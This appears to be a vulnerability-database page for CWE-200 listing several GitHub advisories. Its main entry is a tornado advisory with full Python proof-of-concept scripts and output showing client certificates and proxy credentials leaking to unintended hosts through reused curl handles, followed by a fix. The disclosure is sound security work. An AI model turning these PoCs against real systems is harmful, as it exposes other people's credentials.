CWE-200
DiscouragedExposure of Sensitive Information to an Unauthorized Actor
Abstraction: Class · Status: Draft
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
14319 vulnerabilities reference this CWE, most recent first.
GHSA-PW2R-VQ6V-HR8C
Vulnerability from github – Published: 2022-02-10 00:00 – Updated: 2022-02-14 22:27Exposure of Sensitive Information to an Unauthorized Actor in NPM follow-redirects prior to 1.14.8.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "follow-redirects"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-0536"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-212"
],
"github_reviewed": true,
"github_reviewed_at": "2022-02-11T21:18:03Z",
"nvd_published_at": "2022-02-09T11:15:00Z",
"severity": "MODERATE"
},
"details": "Exposure of Sensitive Information to an Unauthorized Actor in NPM follow-redirects prior to 1.14.8.",
"id": "GHSA-pw2r-vq6v-hr8c",
"modified": "2022-02-14T22:27:56Z",
"published": "2022-02-10T00:00:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0536"
},
{
"type": "WEB",
"url": "https://github.com/follow-redirects/follow-redirects/commit/62e546a99c07c3ee5e4e0718c84a6ca127c5c445"
},
{
"type": "PACKAGE",
"url": "https://github.com/follow-redirects/follow-redirects"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/7cf2bf90-52da-4d59-8028-a73b132de0db"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Exposure of Sensitive Information to an Unauthorized Actor in follow-redirects"
}
GHSA-PW32-8PQC-2CR7
Vulnerability from github – Published: 2022-05-17 05:06 – Updated: 2022-05-17 05:06Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
{
"affected": [],
"aliases": [
"CVE-2013-3823"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-07-17T13:41:00Z",
"severity": "MODERATE"
},
"details": "Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.",
"id": "GHSA-pw32-8pqc-2cr7",
"modified": "2022-05-17T05:06:06Z",
"published": "2022-05-17T05:06:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-3823"
},
{
"type": "WEB",
"url": "http://osvdb.org/95290"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/54230"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/61237"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1028800"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-PW35-9XMG-V8XW
Vulnerability from github – Published: 2025-06-17 15:31 – Updated: 2025-12-11 18:30A flaw was found in the XFIXES extension. The XFixesSetClientDisconnectMode handler does not validate the request length, allowing a client to read unintended memory from previous requests.
{
"affected": [],
"aliases": [
"CVE-2025-49177"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-17T15:15:45Z",
"severity": "MODERATE"
},
"details": "A flaw was found in the XFIXES extension. The XFixesSetClientDisconnectMode handler does not validate the request length, allowing a client to read unintended memory from previous requests.",
"id": "GHSA-pw35-9xmg-v8xw",
"modified": "2025-12-11T18:30:31Z",
"published": "2025-06-17T15:31:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49177"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:10258"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:9303"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:9304"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-49177"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369955"
},
{
"type": "WEB",
"url": "https://gitlab.freedesktop.org/xorg/xserver/-/commit/ab02fb96b1c701c3bb47617d965522c34befa6af"
},
{
"type": "WEB",
"url": "https://www.x.org/wiki/Development/Security"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PW43-H2X7-PM54
Vulnerability from github – Published: 2026-06-07 12:30 – Updated: 2026-06-09 06:31A security vulnerability has been detected in SecureAge CatchPulse up to 10.9.1. Impacted is an unknown function in the library saappctl.sys of the component IOCTL Handler. The manipulation leads to information disclosure. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2026-11459"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-07T10:16:21Z",
"severity": "LOW"
},
"details": "A security vulnerability has been detected in SecureAge CatchPulse up to 10.9.1. Impacted is an unknown function in the library saappctl.sys of the component IOCTL Handler. The manipulation leads to information disclosure. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-pw43-h2x7-pm54",
"modified": "2026-06-09T06:31:56Z",
"published": "2026-06-07T12:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11459"
},
{
"type": "WEB",
"url": "https://github.com/Kalagious/SecureAgeExploit"
},
{
"type": "WEB",
"url": "https://jordanhiggins.blog/catchpulse-antivirus-exploits"
},
{
"type": "WEB",
"url": "https://vandalsuidaho-my.sharepoint.com/:w:/g/personal/higg2059_vandals_uidaho_edu/IQBo2bcYM-FJTpon1vC0En0vAS3OerOp4Nf0EeZIU4u9mgY?e=XAT64X"
},
{
"type": "WEB",
"url": "https://vuldb.com/cve/CVE-2026-11459"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/829131"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/369078"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/369078/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-PW5C-W5J9-42PF
Vulnerability from github – Published: 2022-05-24 17:21 – Updated: 2022-05-24 17:21An issue was discovered in Mattermost Server before 5.9.0, 5.8.1, 5.7.3, and 4.10.8. It allows attackers to obtain sensitive information about whether someone has 2FA enabled.
{
"affected": [],
"aliases": [
"CVE-2019-20877"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-06-19T17:15:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Mattermost Server before 5.9.0, 5.8.1, 5.7.3, and 4.10.8. It allows attackers to obtain sensitive information about whether someone has 2FA enabled.",
"id": "GHSA-pw5c-w5j9-42pf",
"modified": "2022-05-24T17:21:14Z",
"published": "2022-05-24T17:21:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20877"
},
{
"type": "WEB",
"url": "https://mattermost.com/security-updates"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-PW6J-QG29-8W7F
Vulnerability from github – Published: 2026-06-15 20:37 – Updated: 2026-06-15 20:37CurlAsyncHTTPClient leaks per-request credentials on handle reuse
Summary
CurlAsyncHTTPClient pools and reuses pycurl handles across requests but does
not reset them between requests, and several per-request options are applied with
no clearing branch. As a result, sensitive state set by one request persists onto
a later request on the same client that does not set it. Two credential vectors
are demonstrated below — a client TLS certificate (SSLCERT/SSLKEY) and proxy
basic-auth credentials (PROXYUSERPWD) — both leaking to a different,
unintended host. This affects all released versions through 6.5.6.
Details
In tornado/curl_httpclient.py, handles are created once and returned to a free
list for reuse (_process_queue pops the handle at line 200, _finish
re-appends it at line 245), and _curl_setup_request is never preceded by
curl.reset(). The function clears some carried-over state on the reused handle
— unsetopt(PROXYUSERPWD) in the no-proxy branch (line 394), unsetopt(USERPWD)
when no auth is set (line 495), and the HTTP-method flag reset (lines 428-432) —
but other options have no equivalent clearing path and persist until a later
request sets them again.
Vector A — client TLS certificate (SSLCERT/SSLKEY). Set-only, no clearing
branch:
# tornado/curl_httpclient.py (v6.5.6), lines 498-502
if request.client_cert is not None:
curl.setopt(pycurl.SSLCERT, request.client_cert)
if request.client_key is not None:
curl.setopt(pycurl.SSLKEY, request.client_key)
A request that sets client_cert leaves the certificate on the handle; a later
request without client_cert presents it during its TLS handshake.
Vector B — proxy credentials (PROXYUSERPWD). PROXYUSERPWD is set only
inside the credentials branch and unset only in the no-proxy else branch:
# tornado/curl_httpclient.py (v6.5.6), lines 371-394
if request.proxy_host and request.proxy_port:
curl.setopt(pycurl.PROXY, request.proxy_host)
curl.setopt(pycurl.PROXYPORT, request.proxy_port)
if request.proxy_username: # only place PROXYUSERPWD is set
...
curl.setopt(pycurl.PROXYUSERPWD, credentials)
...
else:
try:
curl.unsetopt(pycurl.PROXY)
except TypeError:
curl.setopt(pycurl.PROXY, "")
curl.unsetopt(pycurl.PROXYUSERPWD) # only place it is unset
A request that sets a new proxy_host without proxy_username updates
PROXY/PROXYPORT but never reaches the else, so the previous request's
credentials persist and are sent to the new proxy.
The same class also affects INTERFACE (lines 365-366: set only when
request.network_interface is truthy, with no clearing branch), which is a
lower-severity instance — a later request can be bound to a network interface it
did not request. A single fix addresses all three (see Mitigation).
PoC
Both reproduce against the pinned release using public API only
(CurlAsyncHTTPClient, HTTPRequest, and the documented per-request arguments).
Vector A — client TLS certificate
The two servers listen on different ports, so request B opens a fresh TCP+TLS connection; the certificate can only reach server 2 via the persisted handle option, not connection or session reuse.
python3 -m venv venv
./venv/bin/pip install "tornado==6.5.6" pycurl cryptography
./venv/bin/python poc_client_cert.py
import asyncio
import datetime
import ipaddress
import os
import socket
import ssl
import sys
import tempfile
import threading
from cryptography import x509
from cryptography.x509.oid import NameOID, ExtendedKeyUsageOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from tornado.httpclient import HTTPRequest
from tornado.curl_httpclient import CurlAsyncHTTPClient
def _key():
return rsa.generate_private_key(public_exponent=65537, key_size=2048)
def _ca():
key = _key()
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "PoC-CA")])
now = datetime.datetime.now(datetime.timezone.utc)
cert = (
x509.CertificateBuilder()
.subject_name(name).issuer_name(name)
.public_key(key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(now - datetime.timedelta(minutes=1))
.not_valid_after(now + datetime.timedelta(days=1))
.add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
.sign(key, hashes.SHA256())
)
return cert, key
def _leaf(cn, ca_cert, ca_key, ips=None, client=False):
key = _key()
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])
now = datetime.datetime.now(datetime.timezone.utc)
b = (
x509.CertificateBuilder()
.subject_name(name).issuer_name(ca_cert.subject)
.public_key(key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(now - datetime.timedelta(minutes=1))
.not_valid_after(now + datetime.timedelta(days=1))
.add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
)
if ips:
b = b.add_extension(
x509.SubjectAlternativeName([x509.IPAddress(ipaddress.ip_address(i)) for i in ips]),
critical=False,
)
if client:
b = b.add_extension(
x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CLIENT_AUTH]), critical=False
)
return b.sign(ca_key, hashes.SHA256()), key
def _pem(path, cert, key=None):
with open(path, "wb") as fh:
fh.write(cert.public_bytes(serialization.Encoding.PEM))
if key is not None:
fh.write(key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.TraditionalOpenSSL,
serialization.NoEncryption(),
))
class TLSServer:
def __init__(self, srv_pem, ca_pem, require):
self.captures = []
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind(("127.0.0.1", 0))
self.sock.listen(4)
self.port = self.sock.getsockname()[1]
self.ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.ctx.load_cert_chain(srv_pem)
self.ctx.load_verify_locations(ca_pem)
self.ctx.verify_mode = ssl.CERT_REQUIRED if require else ssl.CERT_OPTIONAL
threading.Thread(target=self._serve, daemon=True).start()
def _serve(self):
while True:
try:
conn, _ = self.sock.accept()
except OSError:
return
try:
s = self.ctx.wrap_socket(conn, server_side=True)
self.captures.append(s.getpeercert() or None)
try:
s.recv(4096)
s.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok")
except Exception:
pass
s.close()
except Exception:
self.captures.append("handshake-failed")
conn.close()
def stop(self):
try:
self.sock.close()
except Exception:
pass
def _cn(peer):
if not peer or not isinstance(peer, dict):
return None
for rdn in peer.get("subject", ()):
for k, v in rdn:
if k == "commonName":
return v
return None
async def main():
with tempfile.TemporaryDirectory() as tmp:
ca_cert, ca_key = _ca()
s1_cert, s1_key = _leaf("server1.local", ca_cert, ca_key, ips=["127.0.0.1"])
s2_cert, s2_key = _leaf("server2.local", ca_cert, ca_key, ips=["127.0.0.1"])
cli_cert, cli_key = _leaf("trusted-client", ca_cert, ca_key, client=True)
ca_pem = os.path.join(tmp, "ca.pem")
s1_pem = os.path.join(tmp, "s1.pem")
s2_pem = os.path.join(tmp, "s2.pem")
cert_pem = os.path.join(tmp, "client.crt")
key_pem = os.path.join(tmp, "client.key")
_pem(ca_pem, ca_cert)
_pem(s1_pem, s1_cert, s1_key)
_pem(s2_pem, s2_cert, s2_key)
_pem(cert_pem, cli_cert)
with open(key_pem, "wb") as fh:
fh.write(cli_key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.TraditionalOpenSSL,
serialization.NoEncryption(),
))
s1 = TLSServer(s1_pem, ca_pem, require=True)
s2 = TLSServer(s2_pem, ca_pem, require=False)
try:
clean = CurlAsyncHTTPClient(max_clients=1, force_instance=True)
await clean.fetch(HTTPRequest(
f"https://127.0.0.1:{s2.port}/baseline",
ca_certs=ca_pem, request_timeout=5), raise_error=False)
clean.close()
client = CurlAsyncHTTPClient(max_clients=1, force_instance=True)
await client.fetch(HTTPRequest(
f"https://127.0.0.1:{s1.port}/internal-mtls",
client_cert=cert_pem, client_key=key_pem,
ca_certs=ca_pem, request_timeout=5), raise_error=False)
await client.fetch(HTTPRequest(
f"https://127.0.0.1:{s2.port}/other-host",
ca_certs=ca_pem, request_timeout=5), raise_error=False)
await asyncio.sleep(0.2)
client.close()
finally:
s1.stop()
s2.stop()
baseline = _cn(s2.captures[0]) if s2.captures else None
leaked = _cn(s2.captures[1]) if len(s2.captures) > 1 else None
print(f"{'scenario':<48}{'cert presented to server 2'}")
print(f"{'-' * 48}{'-' * 28}")
print(f"{'baseline: clean client, no client_cert':<48}{baseline!r}")
print(f"{'exploit: reused handle (A had client_cert)':<48}{leaked!r}")
print()
print(f"(sanity) server 1 (mTLS required) saw: {_cn(s1.captures[0]) if s1.captures else None!r}")
print()
if baseline is None and leaked == "trusted-client":
print("VERDICT: VULNERABLE — the client certificate from request A was "
"presented to server 2 on request B, which specified none.")
return 0
print(f"VERDICT: not reproduced (baseline={baseline!r} leaked={leaked!r})")
return 2
if __name__ == "__main__":
sys.exit(asyncio.run(main()))
Output (pip show tornado → 6.5.6, installed in the venv):
scenario cert presented to server 2
----------------------------------------------------------------------------
baseline: clean client, no client_cert None
exploit: reused handle (A had client_cert) 'trusted-client'
(sanity) server 1 (mTLS required) saw: 'trusted-client'
VERDICT: VULNERABLE — the client certificate from request A was presented to
server 2 on request B, which specified none.
Vector B — proxy credentials
Each proxy is a separate listener capturing the raw request bytes.
./venv/bin/python poc_proxy_creds.py
import asyncio
import base64
import socket
import sys
import threading
from tornado.httpclient import HTTPRequest
from tornado.curl_httpclient import CurlAsyncHTTPClient
class CapturingProxy:
def __init__(self):
self.captures = []
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind(("127.0.0.1", 0))
self.sock.listen(4)
self.port = self.sock.getsockname()[1]
threading.Thread(target=self._serve, daemon=True).start()
def _serve(self):
while True:
try:
conn, _ = self.sock.accept()
except OSError:
return
try:
data = b""
while b"\r\n\r\n" not in data and len(data) < 8192:
chunk = conn.recv(2048)
if not chunk:
break
data += chunk
self.captures.append(data)
conn.sendall(b"HTTP/1.1 502 Bad Gateway\r\nContent-Length: 0\r\n"
b"Connection: close\r\n\r\n")
except Exception:
pass
finally:
conn.close()
def stop(self):
try:
self.sock.close()
except Exception:
pass
def proxy_authz(raw):
head = raw.split(b"\r\n\r\n", 1)[0].decode("latin1", "replace")
for line in head.split("\r\n"):
if line.lower().startswith("proxy-authorization:"):
return line
return None
async def main():
proxy_a = CapturingProxy()
proxy_b = CapturingProxy()
try:
client = CurlAsyncHTTPClient(max_clients=1, force_instance=True)
await client.fetch(HTTPRequest(
"http://target.example/a",
proxy_host="127.0.0.1", proxy_port=proxy_a.port,
proxy_username="alice", proxy_password="secretA",
request_timeout=5, connect_timeout=5), raise_error=False)
await client.fetch(HTTPRequest(
"http://target.example/b",
proxy_host="127.0.0.1", proxy_port=proxy_b.port,
request_timeout=5, connect_timeout=5), raise_error=False)
await asyncio.sleep(0.2)
client.close()
finally:
proxy_a.stop()
proxy_b.stop()
a = proxy_authz(proxy_a.captures[0]) if proxy_a.captures else None
b = proxy_authz(proxy_b.captures[0]) if proxy_b.captures else None
expected = "Basic " + base64.b64encode(b"alice:secretA").decode()
print(f"{'request':<42}{'Proxy-Authorization seen by that proxy'}")
print(f"{'-' * 42}{'-' * 40}")
print(f"{'A -> proxy A (alice:secretA specified)':<42}{a or '(none)'}")
print(f"{'B -> proxy B (NO credentials specified)':<42}{b or '(none)'}")
print()
if b and expected in b:
print(f"VERDICT: VULNERABLE — proxy B received alice's credentials "
f"({expected}) although request B specified no proxy_username.")
return 0
print(f"VERDICT: not reproduced (proxy B saw: {b!r})")
return 2
if __name__ == "__main__":
sys.exit(asyncio.run(main()))
Output (YWxpY2U6c2VjcmV0QQ== decodes to alice:secretA):
request Proxy-Authorization seen by that proxy
----------------------------------------------------------------------------------
A -> proxy A (alice:secretA specified) Proxy-Authorization: Basic YWxpY2U6c2VjcmV0QQ==
B -> proxy B (NO credentials specified) Proxy-Authorization: Basic YWxpY2U6c2VjcmV0QQ==
VERDICT: VULNERABLE — proxy B received alice's credentials (Basic
YWxpY2U6c2VjcmV0QQ==) although request B specified no proxy_username.
Impact
- Type: Exposure of credentials to an unintended party (CWE-200), via reuse of a resource whose sensitive state was not cleared (CWE-672).
- Actors: An application that issues requests with differing per-request
options on a shared
CurlAsyncHTTPClient— for Vector A, mixing per-requestclient_certrequests with non-certificate requests; for Vector B, multiplexing requests across more than one proxy with per-proxy credentials. - Effect: For Vector A, the client completes the TLS client-authentication handshake — proving possession of the private key and disclosing the certificate subject and chain — to a host that was never meant to receive it. For Vector B, proxy basic-auth credentials are transmitted (base64) to a different proxy. If the unintended host/proxy is attacker-controlled or attacker-influenced (a user-supplied URL, webhook target, SSRF-reachable endpoint, or a proxy chosen from user-controlled configuration), the credential is disclosed to the attacker.
- Scope: Only applications using the optional
CurlAsyncHTTPClientbackend with the patterns above are affected. The defaultSimpleAsyncHTTPClientis not affected (and does not support proxies).
Proposed CWE: CWE-200 / CWE-672. Proposed CVSS 3.1:
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N (5.9, medium); attack complexity is
High because exploitation depends on the application using differing per-request
options on a shared client and on handle scheduling.
Mitigation
A single fix closes all instances of this class: call curl.reset() at the start
of _curl_setup_request and then re-apply the per-request options, so no state
from a prior request can persist on the reused handle. (Note curl.reset() also
clears CAINFO, which the current code intentionally leaves untouched — see the
comment at lines 401-409 — so that default would need to be re-established after
the reset.)
Alternatively, add explicit clearing branches mirroring the existing
PROXYUSERPWD/USERPWD handling:
# client certificate
if request.client_cert is not None:
curl.setopt(pycurl.SSLCERT, request.client_cert)
else:
curl.unsetopt(pycurl.SSLCERT)
if request.client_key is not None:
curl.setopt(pycurl.SSLKEY, request.client_key)
else:
curl.unsetopt(pycurl.SSLKEY)
# proxy credentials (inside the `if request.proxy_host and request.proxy_port:` branch)
if request.proxy_username:
...
curl.setopt(pycurl.PROXYUSERPWD, credentials)
else:
curl.unsetopt(pycurl.PROXYUSERPWD)
# network interface
if request.network_interface:
curl.setopt(pycurl.INTERFACE, request.network_interface)
else:
curl.unsetopt(pycurl.INTERFACE)
Until a fix is available, use a separate CurlAsyncHTTPClient instance per
distinct credential set (per client certificate / per proxy credential), or use
SimpleAsyncHTTPClient where applicable.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.5.6"
},
"package": {
"ecosystem": "PyPI",
"name": "tornado"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.5.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-672"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T20:37:24Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "# CurlAsyncHTTPClient leaks per-request credentials on handle reuse\n\n## Summary\n\n`CurlAsyncHTTPClient` pools and reuses `pycurl` handles across requests but does\nnot reset them between requests, and several per-request options are applied with\nno clearing branch. As a result, sensitive state set by one request persists onto\na later request on the same client that does not set it. Two credential vectors\nare demonstrated below \u2014 a client TLS certificate (`SSLCERT`/`SSLKEY`) and proxy\nbasic-auth credentials (`PROXYUSERPWD`) \u2014 both leaking to a different,\nunintended host. This affects all released versions through 6.5.6.\n\n## Details\n\nIn `tornado/curl_httpclient.py`, handles are created once and returned to a free\nlist for reuse (`_process_queue` pops the handle at line 200, `_finish`\nre-appends it at line 245), and `_curl_setup_request` is never preceded by\n`curl.reset()`. The function clears *some* carried-over state on the reused handle\n\u2014 `unsetopt(PROXYUSERPWD)` in the no-proxy branch (line 394), `unsetopt(USERPWD)`\nwhen no auth is set (line 495), and the HTTP-method flag reset (lines 428-432) \u2014\nbut other options have no equivalent clearing path and persist until a later\nrequest sets them again.\n\n**Vector A \u2014 client TLS certificate (`SSLCERT`/`SSLKEY`).** Set-only, no clearing\nbranch:\n\n```python\n# tornado/curl_httpclient.py (v6.5.6), lines 498-502\nif request.client_cert is not None:\n curl.setopt(pycurl.SSLCERT, request.client_cert)\n\nif request.client_key is not None:\n curl.setopt(pycurl.SSLKEY, request.client_key)\n```\n\nA request that sets `client_cert` leaves the certificate on the handle; a later\nrequest without `client_cert` presents it during its TLS handshake.\n\n**Vector B \u2014 proxy credentials (`PROXYUSERPWD`).** `PROXYUSERPWD` is set only\ninside the credentials branch and unset only in the no-proxy `else` branch:\n\n```python\n# tornado/curl_httpclient.py (v6.5.6), lines 371-394\nif request.proxy_host and request.proxy_port:\n curl.setopt(pycurl.PROXY, request.proxy_host)\n curl.setopt(pycurl.PROXYPORT, request.proxy_port)\n if request.proxy_username: # only place PROXYUSERPWD is set\n ...\n curl.setopt(pycurl.PROXYUSERPWD, credentials)\n ...\nelse:\n try:\n curl.unsetopt(pycurl.PROXY)\n except TypeError:\n curl.setopt(pycurl.PROXY, \"\")\n curl.unsetopt(pycurl.PROXYUSERPWD) # only place it is unset\n```\n\nA request that sets a *new* `proxy_host` without `proxy_username` updates\n`PROXY`/`PROXYPORT` but never reaches the `else`, so the previous request\u0027s\ncredentials persist and are sent to the new proxy.\n\nThe same class also affects `INTERFACE` (lines 365-366: set only when\n`request.network_interface` is truthy, with no clearing branch), which is a\nlower-severity instance \u2014 a later request can be bound to a network interface it\ndid not request. A single fix addresses all three (see Mitigation).\n\n## PoC\n\nBoth reproduce against the pinned release using public API only\n(`CurlAsyncHTTPClient`, `HTTPRequest`, and the documented per-request arguments).\n\n### Vector A \u2014 client TLS certificate\n\nThe two servers listen on different ports, so request B opens a fresh TCP+TLS\nconnection; the certificate can only reach server 2 via the persisted handle\noption, not connection or session reuse.\n\n```\npython3 -m venv venv\n./venv/bin/pip install \"tornado==6.5.6\" pycurl cryptography\n./venv/bin/python poc_client_cert.py\n```\n\n```python\nimport asyncio\nimport datetime\nimport ipaddress\nimport os\nimport socket\nimport ssl\nimport sys\nimport tempfile\nimport threading\n\nfrom cryptography import x509\nfrom cryptography.x509.oid import NameOID, ExtendedKeyUsageOID\nfrom cryptography.hazmat.primitives import hashes, serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\n\nfrom tornado.httpclient import HTTPRequest\nfrom tornado.curl_httpclient import CurlAsyncHTTPClient\n\n\ndef _key():\n return rsa.generate_private_key(public_exponent=65537, key_size=2048)\n\n\ndef _ca():\n key = _key()\n name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, \"PoC-CA\")])\n now = datetime.datetime.now(datetime.timezone.utc)\n cert = (\n x509.CertificateBuilder()\n .subject_name(name).issuer_name(name)\n .public_key(key.public_key())\n .serial_number(x509.random_serial_number())\n .not_valid_before(now - datetime.timedelta(minutes=1))\n .not_valid_after(now + datetime.timedelta(days=1))\n .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)\n .sign(key, hashes.SHA256())\n )\n return cert, key\n\n\ndef _leaf(cn, ca_cert, ca_key, ips=None, client=False):\n key = _key()\n name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])\n now = datetime.datetime.now(datetime.timezone.utc)\n b = (\n x509.CertificateBuilder()\n .subject_name(name).issuer_name(ca_cert.subject)\n .public_key(key.public_key())\n .serial_number(x509.random_serial_number())\n .not_valid_before(now - datetime.timedelta(minutes=1))\n .not_valid_after(now + datetime.timedelta(days=1))\n .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)\n )\n if ips:\n b = b.add_extension(\n x509.SubjectAlternativeName([x509.IPAddress(ipaddress.ip_address(i)) for i in ips]),\n critical=False,\n )\n if client:\n b = b.add_extension(\n x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CLIENT_AUTH]), critical=False\n )\n return b.sign(ca_key, hashes.SHA256()), key\n\n\ndef _pem(path, cert, key=None):\n with open(path, \"wb\") as fh:\n fh.write(cert.public_bytes(serialization.Encoding.PEM))\n if key is not None:\n fh.write(key.private_bytes(\n serialization.Encoding.PEM,\n serialization.PrivateFormat.TraditionalOpenSSL,\n serialization.NoEncryption(),\n ))\n\n\nclass TLSServer:\n def __init__(self, srv_pem, ca_pem, require):\n self.captures = []\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.sock.bind((\"127.0.0.1\", 0))\n self.sock.listen(4)\n self.port = self.sock.getsockname()[1]\n self.ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n self.ctx.load_cert_chain(srv_pem)\n self.ctx.load_verify_locations(ca_pem)\n self.ctx.verify_mode = ssl.CERT_REQUIRED if require else ssl.CERT_OPTIONAL\n threading.Thread(target=self._serve, daemon=True).start()\n\n def _serve(self):\n while True:\n try:\n conn, _ = self.sock.accept()\n except OSError:\n return\n try:\n s = self.ctx.wrap_socket(conn, server_side=True)\n self.captures.append(s.getpeercert() or None)\n try:\n s.recv(4096)\n s.sendall(b\"HTTP/1.1 200 OK\\r\\nContent-Length: 2\\r\\nConnection: close\\r\\n\\r\\nok\")\n except Exception:\n pass\n s.close()\n except Exception:\n self.captures.append(\"handshake-failed\")\n conn.close()\n\n def stop(self):\n try:\n self.sock.close()\n except Exception:\n pass\n\n\ndef _cn(peer):\n if not peer or not isinstance(peer, dict):\n return None\n for rdn in peer.get(\"subject\", ()):\n for k, v in rdn:\n if k == \"commonName\":\n return v\n return None\n\n\nasync def main():\n with tempfile.TemporaryDirectory() as tmp:\n ca_cert, ca_key = _ca()\n s1_cert, s1_key = _leaf(\"server1.local\", ca_cert, ca_key, ips=[\"127.0.0.1\"])\n s2_cert, s2_key = _leaf(\"server2.local\", ca_cert, ca_key, ips=[\"127.0.0.1\"])\n cli_cert, cli_key = _leaf(\"trusted-client\", ca_cert, ca_key, client=True)\n\n ca_pem = os.path.join(tmp, \"ca.pem\")\n s1_pem = os.path.join(tmp, \"s1.pem\")\n s2_pem = os.path.join(tmp, \"s2.pem\")\n cert_pem = os.path.join(tmp, \"client.crt\")\n key_pem = os.path.join(tmp, \"client.key\")\n _pem(ca_pem, ca_cert)\n _pem(s1_pem, s1_cert, s1_key)\n _pem(s2_pem, s2_cert, 